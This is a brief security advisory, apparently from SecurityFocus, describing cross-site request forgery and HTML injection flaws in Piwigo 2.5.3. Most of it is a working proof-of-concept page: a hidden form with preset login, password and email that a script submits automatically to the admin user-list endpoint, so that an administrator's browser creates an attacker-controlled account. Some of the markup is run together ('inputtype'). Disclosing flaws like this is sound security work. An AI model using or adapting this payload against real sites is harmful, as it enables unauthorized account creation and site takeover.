source: https://www.securityfocus.com/bid/64357/info
Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser,and steal cookie-based authentication credentials. Other attacks are also possible.
Piwigo 2.5.3is vulnerable; other versions may also be affected.<head><title>POC</title></head><body><form action="http://www.example.com/cms/piwigo/admin.php?page=user_list"id="formid" method="post"><inputtype="hidden" name="login" value="crsfpoc123"/><inputtype="hidden" name="password" value="Password123@"/><inputtype="hidden" name="email" value="xyz@aaww.com"/><inputtype="hidden" name="send_password_by_mail" value="1"/><inputtype="hidden" name="submit_add" value="Submit"/></form><script>
document.getElementById('formid').submit();</script></body></html>